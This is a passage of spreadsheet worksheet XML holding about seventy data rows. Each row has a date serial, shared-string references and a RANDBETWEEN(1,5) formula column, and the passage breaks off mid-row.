    <row r="4039" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4039" s="1">
        <v>43482.603530092594</v>
      </c>
      <c r="B4039" t="s">
        <v>5</v>
      </c>
      <c r="C4039" t="s">
        <v>10</v>
      </c>
      <c r="D4039" t="s">
        <v>36</v>
      </c>
      <c r="E4039" t="s">
        <v>3883</v>
      </c>
      <c r="F4039">
        <f t="shared" ca="1" si="63"/>
        <v>5</v>
      </c>
    </row>
    <row r="4040" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4040" s="1">
        <v>43482.602893518517</v>
      </c>
      <c r="B4040" t="s">
        <v>5</v>
      </c>
      <c r="C4040" t="s">
        <v>3457</v>
      </c>
      <c r="F4040">
        <f t="shared" ca="1" si="63"/>
        <v>5</v>
      </c>
    </row>
    <row r="4041" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A4041" s="1">
        <v>43482.602303240739</v>
      </c>
      <c r="B4041" t="s">
        <v>19</v>
      </c>
      <c r="C4041" t="s">
        <v>10</v>
      </c>
      <c r="D4041" t="s">
        <v>52</v>
      </c>
      <c r="E4041" s="2" t="s">
        <v>3884</v>
      </c>
      <c r="F4041">
        <f t="shared" ca="1" si="63"/>
        <v>4</v>
      </c>
    </row>
    <row r="4042" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4042" s="1">
        <v>43482.601053240738</v>
      </c>
      <c r="B4042" t="s">
        <v>5</v>
      </c>
      <c r="C4042" t="s">
        <v>6</v>
      </c>
      <c r="D4042" t="s">
        <v>25</v>
      </c>
      <c r="F4042">
        <f t="shared" ca="1" si="63"/>
        <v>2</v>
      </c>
    </row>
    <row r="4043" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4043" s="1">
        <v>43482.590509259258</v>
      </c>
      <c r="B4043" t="s">
        <v>5</v>
      </c>
      <c r="C4043" t="s">
        <v>10</v>
      </c>
      <c r="D4043" t="s">
        <v>46</v>
      </c>
      <c r="E4043" t="s">
        <v>3885</v>
      </c>
      <c r="F4043">
        <f t="shared" ca="1" si="63"/>
        <v>2</v>
      </c>
    </row>
    <row r="4044" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4044" s="1">
        <v>43482.58861111111</v>
      </c>
      <c r="B4044" t="s">
        <v>5</v>
      </c>
      <c r="C4044" t="s">
        <v>10</v>
      </c>
      <c r="D4044" t="s">
        <v>89</v>
      </c>
      <c r="F4044">
        <f t="shared" ca="1" si="63"/>
        <v>2</v>
      </c>
    </row>
    <row r="4045" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4045" s="1">
        <v>43482.587337962963</v>
      </c>
      <c r="B4045" t="s">
        <v>19</v>
      </c>
      <c r="C4045" t="s">
        <v>6</v>
      </c>
      <c r="D4045" t="s">
        <v>25</v>
      </c>
      <c r="F4045">
        <f t="shared" ca="1" si="63"/>
        <v>5</v>
      </c>
    </row>
    <row r="4046" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4046" s="1">
        <v>43482.584594907406</v>
      </c>
      <c r="B4046" t="s">
        <v>5</v>
      </c>
      <c r="C4046" t="s">
        <v>10</v>
      </c>
      <c r="D4046" t="s">
        <v>713</v>
      </c>
      <c r="F4046">
        <f t="shared" ca="1" si="63"/>
        <v>5</v>
      </c>
    </row>
    <row r="4047" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A4047" s="1">
        <v>43482.563680555555</v>
      </c>
      <c r="B4047" t="s">
        <v>5</v>
      </c>
      <c r="C4047" t="s">
        <v>10</v>
      </c>
      <c r="D4047" t="s">
        <v>33</v>
      </c>
      <c r="E4047" s="2" t="s">
        <v>3886</v>
      </c>
      <c r="F4047">
        <f t="shared" ca="1" si="63"/>
        <v>3</v>
      </c>
    </row>
    <row r="4048" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4048" s="1">
        <v>43482.538553240738</v>
      </c>
      <c r="B4048" t="s">
        <v>13</v>
      </c>
      <c r="C4048" t="s">
        <v>10</v>
      </c>
      <c r="D4048" t="s">
        <v>112</v>
      </c>
      <c r="E4048" s="2" t="s">
        <v>3887</v>
      </c>
      <c r="F4048">
        <f t="shared" ca="1" si="63"/>
        <v>2</v>
      </c>
    </row>
    <row r="4049" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4049" s="1">
        <v>43482.532337962963</v>
      </c>
      <c r="B4049" t="s">
        <v>19</v>
      </c>
      <c r="C4049" t="s">
        <v>10</v>
      </c>
      <c r="D4049" t="s">
        <v>36</v>
      </c>
      <c r="E4049" t="s">
        <v>3888</v>
      </c>
      <c r="F4049">
        <f t="shared" ca="1" si="63"/>
        <v>1</v>
      </c>
    </row>
    <row r="4050" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A4050" s="1">
        <v>43482.527800925927</v>
      </c>
      <c r="B4050" t="s">
        <v>19</v>
      </c>
      <c r="C4050" t="s">
        <v>71</v>
      </c>
      <c r="E4050" s="2" t="s">
        <v>3889</v>
      </c>
      <c r="F4050">
        <f t="shared" ca="1" si="63"/>
        <v>5</v>
      </c>
    </row>
    <row r="4051" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4051" s="1">
        <v>43482.517256944448</v>
      </c>
      <c r="B4051" t="s">
        <v>1305</v>
      </c>
      <c r="C4051" t="s">
        <v>10</v>
      </c>
      <c r="D4051" t="s">
        <v>6</v>
      </c>
      <c r="E4051" t="s">
        <v>3890</v>
      </c>
      <c r="F4051">
        <f t="shared" ca="1" si="63"/>
        <v>3</v>
      </c>
    </row>
    <row r="4052" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4052" s="1">
        <v>43482.511145833334</v>
      </c>
      <c r="B4052" t="s">
        <v>19</v>
      </c>
      <c r="C4052" t="s">
        <v>10</v>
      </c>
      <c r="D4052" t="s">
        <v>36</v>
      </c>
      <c r="E4052" t="s">
        <v>3891</v>
      </c>
      <c r="F4052">
        <f t="shared" ca="1" si="63"/>
        <v>4</v>
      </c>
    </row>
    <row r="4053" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4053" s="1">
        <v>43482.511064814818</v>
      </c>
      <c r="B4053" t="s">
        <v>19</v>
      </c>
      <c r="C4053" t="s">
        <v>41</v>
      </c>
      <c r="E4053" t="s">
        <v>3892</v>
      </c>
      <c r="F4053">
        <f t="shared" ca="1" si="63"/>
        <v>5</v>
      </c>
    </row>
    <row r="4054" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4054" s="1">
        <v>43482.510115740741</v>
      </c>
      <c r="B4054" t="s">
        <v>5</v>
      </c>
      <c r="C4054" t="s">
        <v>16</v>
      </c>
      <c r="E4054" t="s">
        <v>3893</v>
      </c>
      <c r="F4054">
        <f t="shared" ca="1" si="63"/>
        <v>3</v>
      </c>
    </row>
    <row r="4055" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4055" s="1">
        <v>43482.504791666666</v>
      </c>
      <c r="B4055" t="s">
        <v>19</v>
      </c>
      <c r="C4055" t="s">
        <v>6</v>
      </c>
      <c r="D4055" t="s">
        <v>25</v>
      </c>
      <c r="E4055" t="s">
        <v>3894</v>
      </c>
      <c r="F4055">
        <f t="shared" ca="1" si="63"/>
        <v>5</v>
      </c>
    </row>
    <row r="4056" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4056" s="1">
        <v>43482.48364583333</v>
      </c>
      <c r="B4056" t="s">
        <v>35</v>
      </c>
      <c r="C4056" t="s">
        <v>97</v>
      </c>
      <c r="D4056" t="s">
        <v>124</v>
      </c>
      <c r="E4056" t="s">
        <v>3895</v>
      </c>
      <c r="F4056">
        <f t="shared" ca="1" si="63"/>
        <v>3</v>
      </c>
    </row>
    <row r="4057" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A4057" s="1">
        <v>43482.448576388888</v>
      </c>
      <c r="B4057" t="s">
        <v>5</v>
      </c>
      <c r="C4057" t="s">
        <v>535</v>
      </c>
      <c r="E4057" s="2" t="s">
        <v>3896</v>
      </c>
      <c r="F4057">
        <f t="shared" ca="1" si="63"/>
        <v>4</v>
      </c>
    </row>
    <row r="4058" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4058" s="1">
        <v>43482.44462962963</v>
      </c>
      <c r="B4058" t="s">
        <v>35</v>
      </c>
      <c r="C4058" t="s">
        <v>10</v>
      </c>
      <c r="D4058" t="s">
        <v>112</v>
      </c>
      <c r="E4058" t="s">
        <v>3897</v>
      </c>
      <c r="F4058">
        <f t="shared" ca="1" si="63"/>
        <v>1</v>
      </c>
    </row>
    <row r="4059" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4059" s="1">
        <v>43482.437083333331</v>
      </c>
      <c r="B4059" t="s">
        <v>1305</v>
      </c>
      <c r="C4059" t="s">
        <v>10</v>
      </c>
      <c r="D4059" t="s">
        <v>52</v>
      </c>
      <c r="E4059" t="s">
        <v>3898</v>
      </c>
      <c r="F4059">
        <f t="shared" ca="1" si="63"/>
        <v>3</v>
      </c>
    </row>
    <row r="4060" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A4060" s="1">
        <v>43482.436215277776</v>
      </c>
      <c r="B4060" t="s">
        <v>13</v>
      </c>
      <c r="C4060" t="s">
        <v>103</v>
      </c>
      <c r="E4060" s="2" t="s">
        <v>3899</v>
      </c>
      <c r="F4060">
        <f t="shared" ca="1" si="63"/>
        <v>2</v>
      </c>
    </row>
    <row r="4061" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4061" s="1">
        <v>43482.427060185182</v>
      </c>
      <c r="B4061" t="s">
        <v>19</v>
      </c>
      <c r="C4061" t="s">
        <v>10</v>
      </c>
      <c r="D4061" t="s">
        <v>112</v>
      </c>
      <c r="E4061" t="s">
        <v>3900</v>
      </c>
      <c r="F4061">
        <f t="shared" ca="1" si="63"/>
        <v>5</v>
      </c>
    </row>
    <row r="4062" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4062" s="1">
        <v>43482.421631944446</v>
      </c>
      <c r="B4062" t="s">
        <v>13</v>
      </c>
      <c r="C4062" t="s">
        <v>10</v>
      </c>
      <c r="D4062" t="s">
        <v>112</v>
      </c>
      <c r="E4062" t="s">
        <v>3901</v>
      </c>
      <c r="F4062">
        <f t="shared" ca="1" si="63"/>
        <v>1</v>
      </c>
    </row>
    <row r="4063" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A4063" s="1">
        <v>43482.399178240739</v>
      </c>
      <c r="B4063" t="s">
        <v>5</v>
      </c>
      <c r="C4063" t="s">
        <v>71</v>
      </c>
      <c r="E4063" s="2" t="s">
        <v>3902</v>
      </c>
      <c r="F4063">
        <f t="shared" ca="1" si="63"/>
        <v>4</v>
      </c>
    </row>
    <row r="4064" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A4064" s="1">
        <v>43482.395162037035</v>
      </c>
      <c r="B4064" t="s">
        <v>19</v>
      </c>
      <c r="C4064" t="s">
        <v>65</v>
      </c>
      <c r="E4064" s="2" t="s">
        <v>3903</v>
      </c>
      <c r="F4064">
        <f t="shared" ca="1" si="63"/>
        <v>1</v>
      </c>
    </row>
    <row r="4065" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A4065" s="1">
        <v>43482.387013888889</v>
      </c>
      <c r="B4065" t="s">
        <v>13</v>
      </c>
      <c r="C4065" t="s">
        <v>10</v>
      </c>
      <c r="D4065" t="s">
        <v>23</v>
      </c>
      <c r="E4065" s="2" t="s">
        <v>3904</v>
      </c>
      <c r="F4065">
        <f t="shared" ca="1" si="63"/>
        <v>5</v>
      </c>
    </row>
    <row r="4066" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A4066" s="1">
        <v>43482.369803240741</v>
      </c>
      <c r="B4066" t="s">
        <v>19</v>
      </c>
      <c r="C4066" t="s">
        <v>173</v>
      </c>
      <c r="E4066" s="2" t="s">
        <v>3905</v>
      </c>
      <c r="F4066">
        <f t="shared" ca="1" si="63"/>
        <v>5</v>
      </c>
    </row>
    <row r="4067" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4067" s="1">
        <v>43482.369791666664</v>
      </c>
      <c r="B4067" t="s">
        <v>1305</v>
      </c>
      <c r="C4067" t="s">
        <v>60</v>
      </c>
      <c r="E4067" t="s">
        <v>3906</v>
      </c>
      <c r="F4067">
        <f t="shared" ca="1" si="63"/>
        <v>1</v>
      </c>
    </row>
    <row r="4068" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4068" s="1">
        <v>43482.353356481479</v>
      </c>
      <c r="B4068" t="s">
        <v>13</v>
      </c>
      <c r="C4068" t="s">
        <v>10</v>
      </c>
      <c r="D4068" t="s">
        <v>89</v>
      </c>
      <c r="E4068" t="s">
        <v>3907</v>
      </c>
      <c r="F4068">
        <f t="shared" ca="1" si="63"/>
        <v>3</v>
      </c>
    </row>
    <row r="4069" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4069" s="1">
        <v>43482.347766203704</v>
      </c>
      <c r="B4069" t="s">
        <v>19</v>
      </c>
      <c r="C4069" t="s">
        <v>60</v>
      </c>
      <c r="E4069" t="s">
        <v>3908</v>
      </c>
      <c r="F4069">
        <f t="shared" ca="1" si="63"/>
        <v>3</v>
      </c>
    </row>
    <row r="4070" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4070" s="1">
        <v>43482.345277777778</v>
      </c>
      <c r="B4070" t="s">
        <v>5</v>
      </c>
      <c r="C4070" t="s">
        <v>60</v>
      </c>
      <c r="E4070" t="s">
        <v>3909</v>
      </c>
      <c r="F4070">
        <f t="shared" ca="1" si="63"/>
        <v>2</v>
      </c>
    </row>
    <row r="4071" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4071" s="1">
        <v>43482.337395833332</v>
      </c>
      <c r="B4071" t="s">
        <v>5</v>
      </c>
      <c r="C4071" t="s">
        <v>48</v>
      </c>
      <c r="E4071" t="s">
        <v>3910</v>
      </c>
      <c r="F4071">
        <f t="shared" ca="1" si="63"/>
        <v>5</v>
      </c>
    </row>
    <row r="4072" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4072" s="1">
        <v>43482.33625</v>
      </c>
      <c r="B4072" t="s">
        <v>5</v>
      </c>
      <c r="C4072" t="s">
        <v>60</v>
      </c>
      <c r="E4072" t="s">
        <v>3911</v>
      </c>
      <c r="F4072">
        <f t="shared" ca="1" si="63"/>
        <v>1</v>
      </c>
    </row>
    <row r="4073" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4073" s="1">
        <v>43482.321527777778</v>
      </c>
      <c r="B4073" t="s">
        <v>13</v>
      </c>
      <c r="C4073" t="s">
        <v>10</v>
      </c>
      <c r="D4073" t="s">
        <v>80</v>
      </c>
      <c r="E4073" t="s">
        <v>3912</v>
      </c>
      <c r="F4073">
        <f t="shared" ca="1" si="63"/>
        <v>2</v>
      </c>
    </row>
    <row r="4074" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A4074" s="1">
        <v>43482.294548611113</v>
      </c>
      <c r="B4074" t="s">
        <v>19</v>
      </c>
      <c r="C4074" t="s">
        <v>48</v>
      </c>
      <c r="E4074" s="2" t="s">
        <v>3913</v>
      </c>
      <c r="F4074">
        <f t="shared" ca="1" si="63"/>
        <v>3</v>
      </c>
    </row>
    <row r="4075" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4075" s="1">
        <v>43482.275740740741</v>
      </c>
      <c r="B4075" t="s">
        <v>5</v>
      </c>
      <c r="C4075" t="s">
        <v>127</v>
      </c>
      <c r="D4075" t="s">
        <v>163</v>
      </c>
      <c r="E4075" t="s">
        <v>3914</v>
      </c>
      <c r="F4075">
        <f t="shared" ca="1" si="63"/>
        <v>2</v>
      </c>
    </row>
    <row r="4076" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A4076" s="1">
        <v>43482.249537037038</v>
      </c>
      <c r="B4076" t="s">
        <v>5</v>
      </c>
      <c r="C4076" t="s">
        <v>41</v>
      </c>
      <c r="E4076" s="2" t="s">
        <v>3915</v>
      </c>
      <c r="F4076">
        <f t="shared" ca="1" si="63"/>
        <v>1</v>
      </c>
    </row>
    <row r="4077" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4077" s="1">
        <v>43482.246516203704</v>
      </c>
      <c r="B4077" t="s">
        <v>1305</v>
      </c>
      <c r="C4077" t="s">
        <v>139</v>
      </c>
      <c r="F4077">
        <f t="shared" ca="1" si="63"/>
        <v>2</v>
      </c>
    </row>
    <row r="4078" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4078" s="1">
        <v>43482.236168981479</v>
      </c>
      <c r="B4078" t="s">
        <v>13</v>
      </c>
      <c r="C4078" t="s">
        <v>197</v>
      </c>
      <c r="E4078" t="s">
        <v>3916</v>
      </c>
      <c r="F4078">
        <f t="shared" ca="1" si="63"/>
        <v>2</v>
      </c>
    </row>
    <row r="4079" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4079" s="1">
        <v>43482.233622685184</v>
      </c>
      <c r="B4079" t="s">
        <v>13</v>
      </c>
      <c r="C4079" t="s">
        <v>48</v>
      </c>
      <c r="E4079" t="s">
        <v>3917</v>
      </c>
      <c r="F4079">
        <f t="shared" ca="1" si="63"/>
        <v>2</v>
      </c>
    </row>
    <row r="4080" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4080" s="1">
        <v>43482.227465277778</v>
      </c>
      <c r="B4080" t="s">
        <v>5</v>
      </c>
      <c r="C4080" t="s">
        <v>60</v>
      </c>
      <c r="E4080" t="s">
        <v>3918</v>
      </c>
      <c r="F4080">
        <f t="shared" ca="1" si="63"/>
        <v>4</v>
      </c>
    </row>
    <row r="4081" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A4081" s="1">
        <v>43482.185810185183</v>
      </c>
      <c r="B4081" t="s">
        <v>19</v>
      </c>
      <c r="C4081" t="s">
        <v>50</v>
      </c>
      <c r="E4081" s="2" t="s">
        <v>3919</v>
      </c>
      <c r="F4081">
        <f t="shared" ca="1" si="63"/>
        <v>4</v>
      </c>
    </row>
    <row r="4082" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4082" s="1">
        <v>43482.122037037036</v>
      </c>
      <c r="B4082" t="s">
        <v>5</v>
      </c>
      <c r="C4082" t="s">
        <v>253</v>
      </c>
      <c r="E4082" t="s">
        <v>3920</v>
      </c>
      <c r="F4082">
        <f t="shared" ca="1" si="63"/>
        <v>2</v>
      </c>
    </row>
    <row r="4083" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A4083" s="1">
        <v>43482.111319444448</v>
      </c>
      <c r="B4083" t="s">
        <v>5</v>
      </c>
      <c r="C4083" t="s">
        <v>41</v>
      </c>
      <c r="E4083" s="2" t="s">
        <v>3921</v>
      </c>
      <c r="F4083">
        <f t="shared" ca="1" si="63"/>
        <v>1</v>
      </c>
    </row>
    <row r="4084" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4084" s="1">
        <v>43482.087418981479</v>
      </c>
      <c r="B4084" t="s">
        <v>5</v>
      </c>
      <c r="C4084" t="s">
        <v>2108</v>
      </c>
      <c r="E4084" t="s">
        <v>2241</v>
      </c>
      <c r="F4084">
        <f t="shared" ca="1" si="63"/>
        <v>5</v>
      </c>
    </row>
    <row r="4085" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4085" s="1">
        <v>43482.066412037035</v>
      </c>
      <c r="B4085" t="s">
        <v>19</v>
      </c>
      <c r="C4085" t="s">
        <v>2108</v>
      </c>
      <c r="E4085" t="s">
        <v>3922</v>
      </c>
      <c r="F4085">
        <f t="shared" ca="1" si="63"/>
        <v>5</v>
      </c>
    </row>
    <row r="4086" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4086" s="1">
        <v>43482.03974537037</v>
      </c>
      <c r="B4086" t="s">
        <v>13</v>
      </c>
      <c r="C4086" t="s">
        <v>41</v>
      </c>
      <c r="E4086" t="s">
        <v>3923</v>
      </c>
      <c r="F4086">
        <f t="shared" ca="1" si="63"/>
        <v>4</v>
      </c>
    </row>
    <row r="4087" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4087" s="1">
        <v>43482.033634259256</v>
      </c>
      <c r="B4087" t="s">
        <v>13</v>
      </c>
      <c r="C4087" t="s">
        <v>10</v>
      </c>
      <c r="D4087" t="s">
        <v>6</v>
      </c>
      <c r="E4087" t="s">
        <v>3924</v>
      </c>
      <c r="F4087">
        <f t="shared" ca="1" si="63"/>
        <v>2</v>
      </c>
    </row>
    <row r="4088" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4088" s="1">
        <v>43482.020902777775</v>
      </c>
      <c r="B4088" t="s">
        <v>13</v>
      </c>
      <c r="C4088" t="s">
        <v>41</v>
      </c>
      <c r="E4088" t="s">
        <v>3925</v>
      </c>
      <c r="F4088">
        <f t="shared" ca="1" si="63"/>
        <v>3</v>
      </c>
    </row>
    <row r="4089" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A4089" s="1">
        <v>43481.920104166667</v>
      </c>
      <c r="B4089" t="s">
        <v>19</v>
      </c>
      <c r="C4089" t="s">
        <v>73</v>
      </c>
      <c r="E4089" s="2" t="s">
        <v>3926</v>
      </c>
      <c r="F4089">
        <f t="shared" ca="1" si="63"/>
        <v>1</v>
      </c>
    </row>
    <row r="4090" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4090" s="1">
        <v>43481.913414351853</v>
      </c>
      <c r="B4090" t="s">
        <v>1305</v>
      </c>
      <c r="C4090" t="s">
        <v>41</v>
      </c>
      <c r="E4090" t="s">
        <v>3927</v>
      </c>
      <c r="F4090">
        <f t="shared" ca="1" si="63"/>
        <v>3</v>
      </c>
    </row>
    <row r="4091" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A4091" s="1">
        <v>43481.912002314813</v>
      </c>
      <c r="B4091" t="s">
        <v>19</v>
      </c>
      <c r="C4091" t="s">
        <v>10</v>
      </c>
      <c r="D4091" t="s">
        <v>381</v>
      </c>
      <c r="E4091" s="2" t="s">
        <v>3928</v>
      </c>
      <c r="F4091">
        <f t="shared" ca="1" si="63"/>
        <v>4</v>
      </c>
    </row>
    <row r="4092" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4092" s="1">
        <v>43481.855023148149</v>
      </c>
      <c r="B4092" t="s">
        <v>19</v>
      </c>
      <c r="C4092" t="s">
        <v>10</v>
      </c>
      <c r="D4092" t="s">
        <v>178</v>
      </c>
      <c r="E4092" t="s">
        <v>3929</v>
      </c>
      <c r="F4092">
        <f t="shared" ca="1" si="63"/>
        <v>3</v>
      </c>
    </row>
    <row r="4093" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A4093" s="1">
        <v>43481.837083333332</v>
      </c>
      <c r="B4093" t="s">
        <v>5</v>
      </c>
      <c r="C4093" t="s">
        <v>140</v>
      </c>
      <c r="D4093" t="s">
        <v>234</v>
      </c>
      <c r="E4093" s="2" t="s">
        <v>3930</v>
      </c>
      <c r="F4093">
        <f t="shared" ca="1" si="63"/>
        <v>4</v>
      </c>
    </row>
    <row r="4094" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4094" s="1">
        <v>43481.742650462962</v>
      </c>
      <c r="B4094" t="s">
        <v>19</v>
      </c>
      <c r="C4094" t="s">
        <v>10</v>
      </c>
      <c r="D4094" t="s">
        <v>46</v>
      </c>
      <c r="E4094" t="s">
        <v>3931</v>
      </c>
      <c r="F4094">
        <f t="shared" ca="1" si="63"/>
        <v>3</v>
      </c>
    </row>
    <row r="4095" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4095" s="1">
        <v>43481.718692129631</v>
      </c>
      <c r="B4095" t="s">
        <v>5</v>
      </c>
      <c r="C4095" t="s">
        <v>10</v>
      </c>
      <c r="D4095" t="s">
        <v>6</v>
      </c>
      <c r="E4095" t="s">
        <v>3932</v>
      </c>
      <c r="F4095">
        <f t="shared" ca="1" si="63"/>
        <v>2</v>
      </c>
    </row>
    <row r="4096" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4096" s="1">
        <v>43481.705462962964</v>
      </c>
      <c r="B4096" t="s">
        <v>19</v>
      </c>
      <c r="C4096" t="s">
        <v>140</v>
      </c>
      <c r="D4096" t="s">
        <v>234</v>
      </c>
      <c r="E4096" t="s">
        <v>3933</v>
      </c>
      <c r="F4096">
        <f t="shared" ca="1" si="63"/>
        <v>1</v>
      </c>
    </row>
    <row r="4097" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4097" s="1">
        <v>43481.704108796293</v>
      </c>
      <c r="B4097" t="s">
        <v>13</v>
      </c>
      <c r="C4097" t="s">
        <v>10</v>
      </c>
      <c r="D4097" t="s">
        <v>163</v>
      </c>
      <c r="E4097" t="s">
        <v>3934</v>
      </c>
      <c r="F4097">
        <f t="shared" ca="1" si="63"/>
        <v>4</v>
      </c>
    </row>
    <row r="4098" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A4098" s="1">
        <v>43481.694502314815</v>
      </c>
      <c r="B4098" t="s">
        <v>19</v>
      </c>
      <c r="C4098" t="s">
        <v>10</v>
      </c>
      <c r="D4098" t="s">
        <v>192</v>
      </c>
      <c r="E4098" s="2" t="s">
        <v>3935</v>
      </c>
      <c r="F4098">
        <f t="shared" ref="F4098:F4161" ca="1" si="64">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="4099" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A4099" s="1">
        <v>43481.686898148146</v>
      </c>
      <c r="B4099" t="s">
        <v>1305</v>
      </c>
      <c r="C4099" t="s">
        <v>10</v>
      </c>
      <c r="D4099" t="s">
        <v>89</v>
      </c>
      <c r="E4099" s="2" t="s">
        <v>3936</v>
      </c>
      <c r="F4099">
        <f t="shared" ca="1" si="64"/>
        <v>2</v>
      </c>
    </row>
    <row r="4100" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4100" s="1">
        <v>43481.667685185188</v>
      </c>
      <c r="B4100" t="s">
        <v>19</v>
      </c>
      <c r="C4100" t="s">
        <v>10</v>
      </c>
      <c r="D4100" t="s">
        <v>89</v>
      </c>
      <c r="E4100" t="s">
        <v>3937</v>
      </c>
      <c r="F4100">
        <f t="shared" ca="1" si="64"/>
        <v>3</v>
      </c>
    </row>
    <row r="4101" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A4101" s="1">
        <v>43481.650370370371</v>
      </c>
      <c r="B4101" t="s">
        <v>13</v>
      </c>
      <c r="C4101" t="s">
        <v>6</v>
      </c>
      <c r="D4101" t="s">
        <v>821</v>
      </c>
      <c r="E4101" s="2" t="s">
        <v>3938</v>
      </c>
      <c r="F4101">
        <f t="shared" ca="1" si="64"/>
        <v>5</v>
      </c>
    </row>
    <row r="4102" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A4102" s="1">
        <v>43481.643645833334</v>
      </c>
      <c r="B4102" t="s">
        <v>5</v>
      </c>
      <c r="C4102" t="s">
        <v>10</v>
      </c>
      <c r="D4102" t="s">
        <v>52</v>
      </c>
      <c r="E4102" s="2" t="s">
        <v>3939</v>
      </c>
      <c r="F4102">
        <f t="shared" ca="1" si="64"/>
        <v>4</v>
      </c>
    </row>
    <row r="4103" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4103" s="1">
        <v>43481.637199074074</v>
      </c>
      <c r="B4103" t="s">
        <v>5</v>
      </c>
      <c r="C4103" t="s">
        <v>10</v>
      </c>
      <c r="D4103" t="s">
        <v>92</v>
      </c>
      <c r="E4103" t="s">
        <v>3940</v>
      </c>
      <c r="F4103">
        <f t="shared" ca="1" si="64"/>
        <v>5</v>
      </c>
    </row>
    <row r="4104" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4104" s="1">
        <v>43481.624537037038</v>
      </c>
      <c r="B4104" t="s">
        <v>1305</v>
      </c>
      <c r="C4104" t="s">
        <v>10</v>
      </c>
      <c r="D4104" t="s">
        <v>163</v>
      </c>
      <c r="E4104" t="s">
        <v>3941</v>
      </c>
      <c r="F4104">
        <f t="shared" ca="1" si="64"/>
        <v>5</v>
      </c>
    </row>
    <row r="4105" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A4105" s="1">
        <v>43481.591516203705</v>
      </c>
      <c r="B4105" t="s">
        <v>13</v>
      </c>
      <c r="C4105" t="s">
        <v>10</v>
      </c>
      <c r="D4105" t="s">
        <v>89</v>
      </c>
      <c r="E4105" s="2" t="s">
        <v>3942</v>
      </c>
      <c r="F4105">
        <f t="shared" ca="1" si="64"/>
        <v>5</v>
      </c>
    </row>
    <row r="4106" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4106" s="1">
        <v>43481.576782407406</v>
      </c>
      <c r="B4106" t="s">
        <v>1305</v>
      </c>
      <c r="C4106" t="s">
        <v>6</v>
      </c>
      <c r="D4106" t="s">
        <v>25</v>
      </c>
      <c r="E4106" t="s">
        <v>3943</v>
      </c>
      <c r="F4106">
        <f t="shared" ca="1" si="64"/>
        <v>1</v>
      </c>
    </row>
    <row r="4107" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4107" s="1">
        <v>43481.572881944441</v>
      </c>
      <c r="B4107" t="s">
        <v>13</v>
      </c>
      <c r="C4107" t="s">
        <v>10</v>
      </c>
      <c r="D4107" t="s">
        <v>41</v>
      </c>
      <c r="E4107" t="s">
        <v>3944</v>
      </c>
      <c r="F4107">
        <f t="shared" ca="1" si="64"/>
        <v>4</v>
      </c>
    </row>
    <row r="4108" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4108" s="1">
        <v>43481.559421296297</v>
      </c>
      <c r="B4108" t="s">
        <v>5</v>
